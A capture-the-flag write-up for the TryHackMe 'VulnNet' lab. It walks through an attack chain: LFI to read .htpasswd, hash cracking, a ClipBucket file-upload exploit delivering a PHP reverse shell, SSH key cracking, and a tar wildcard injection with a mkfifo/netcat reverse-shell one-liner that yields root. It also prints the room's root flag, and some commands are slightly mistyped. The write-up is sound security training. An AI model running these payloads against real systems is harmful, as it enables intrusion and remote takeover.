TryHackMe - Vulnet Writeup

tags: writeup tryhackme vulnet medium

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

nmap -sC -sV -v -p- -T4 -oN Ports 10.10.124.152

There are two open ports:

• Port 22 : Default port for Secure Shell. Secure Protocol and encrypted data. Service name is OpenSSH and version is 7.6p1
• Port 80 : Default HTTP port. Apache is the web server and the version is httpd 2.4.29

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

Fuzzing HTTP Service

As we only have the http service available while we check the page we fuzz it to get interesting directories, in this case I will use ffuf since it is written in go and it will make the fuzzing task much faster.

ffuf -u "http://vulnnet.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404 -t 50

Ffuf Explanation

• The -u flag indicates the URL of the web page.
• The -W flag indicates the wordlist that we gonna use to fuzz.
• The -fc flag avoids the various status codes that you specify.
• The -t flag set the number of threads that run at the same time fuzzing, in this case i use 50 for ctf, maybe if you use more like 100 or 150 could show fake responses.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://vulnnet.thm/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 404
________________________________________________

                        [Status: 200, Size: 5829, Words: 1689, Lines: 142]
# directory-list-2.3-medium.txt [Status: 200, Size: 5829, Words: 1689, Lines: 142]
img                     [Status: 301, Size: 308, Words: 20, Lines: 10]Lines: 142]
#                       [Status: 200, Size: 5829, Words: 1689, Lines: 142]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10]
                        [Status: 200, Size: 5829, Words: 1689, Lines: 142]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220560/220560] :: Job [1/1] :: 795 req/sec :: Duration: [0:05:07] :: Errors: 0 ::                                          

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Subdirectory Enumeration

The js subdirectory seems interesant, and inside there are two obfuscated js binaries.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

JavaScript Deobfuscation

If we read the first js we can see this parameter:

    return n.d(t, "a", t), t;
  }, n.o = function (e, t) {
    return Object.prototype.hasOwnProperty.call(e, t);
  }, n.p = "http://vulnnet.thm/index.php?referer=", n(n.s = 0);
}({0: function (e, t, n) 

In the second js we can see some subdirectory:

   t.o = function (a, e) {
    return Object.prototype.hasOwnProperty.call(a, e);
  }, t.p = "http://broadcast.vulnnet.thm", t(t.s = 0);
}({0: function (a, e, t) {
  a.exports = t("WdQY");
}, WdQY: function (a, e, t) {
  "use strict";

Now we know theres an LFI and other application lets check inside the subweb.

For look into the subdomain we have to put into /etc/hosts

echo "10.10.32.192    broadcast.vulnnet.thm" >> /etc/hosts

When you enter to the subdomain it requires password

To know this we have to found the .htaccess file of broadcast.vulnnet.thm

As the server is an apache we will look at the apache2 default configuration folder, which is

/etc/apache2/sites-enabled/000-default.conf

In order to see the file we will use the LFI and we will look at the source code in such a way that the link looks like this

view-source:http://vulnnet.thm/?referer=/etc/apache2/sites-enabled/000-default.conf

If you can see, now you know the directory of .htpasswd

/etc/apache2/.htpasswd

Following the same method we found a user and a hashed password

developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Cracking password hashes with John

Write the hash into a binary with this command:

echo $apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0 > hash

Now we going to use John, go to the binary with the hash inside and start John

john crack --wordlist=/usr/share/wordlists/rockyou.txt

The cracked password obtained now we are gonna use to enter in the subdomain.

developers : (crackedpasswd)

Inside the Subdomain

When you enter the web you can see it's a clipbucket web and if you view the source code yo can look the version of it.

And if you look on exploit-db you can found the exploit.

This exploit permits to upload files to the clipbucket so we are going to prepare a php reverse shell, if you are in kali you can copy the php reverse shell from:

/usr/share/webshells/php/php-reverse-shell.php

Copy the webshell to your Machine directory and edit with nano to put your vpn ip and your listen port.

It looks like this:

Uploading the webshell to Clipbucket

Following the Exploit you have to go to the updated webshell folder and rename to anyname.php , next

curl -F "file=@anyname.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<passwd>

Before you execute the webshell start a listener:

nc -nlvp 1234

Next execute the webshell go to /files this could be the directory :

http://broadcast.vulnnet.thm/files/photos/2021/09/02/16306000813aa88a.php

And PWN! We have revere shell but with the www-data user.

If you observed i write rlwrap before the nc command , this tool give us more interactivity to the shell but don't works always so we have to upgrade to tty.

Privesc to User

If you look into the /var/backups directory you could find the ssh-backup.tar.gz file.

To decompress it use:

tar xvf backup.tar.gz

When you decompress it you obtain a encrypted private key that you can crack it with john, but to be crackable for john first it has to be converted with ssh2john.py

python /usr/share/john/ssh2john.py id_rsa > crack

After this you should obtain something like this:

Now you can crack the binary with john too, and use the same command but changing the binary , this is the command:

john crack –wordlist=/usr/share/wordlists/rockyou.txt

Once you crack the file you obtain the passphrase and you can login into the ssh with the private ecrypted key.

ssh -i id_rsa server-management@10.10.43.115

with this go to $HOME of server-management and you can cat User Flag

Root Privesc

To privesc to root i used a spanish tool called linpeas.

With linpeas i enumerated most of the possible privesc and discovered something interesting on cron.

There's look into backupsrv.sh

Now we can see there's a wildcard vulnerability in here, always we use tar with a wildcard, we can create files that can get executed. More info here.

Create a binary inside $HOME/server-management/Documents that contains this:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <ip> 1234 > /tmp/f

After create the binary enter this commands:

echo > '–checkpoint=1'
echo > '–checkpoint-action-exec=sh shell.sh'

Start a netcat listener and wait a few seconds to receive the root shell.

cat /root/root.txt
THM{220b671dd8adc301b34c2738ee8295ba}

You can find me on: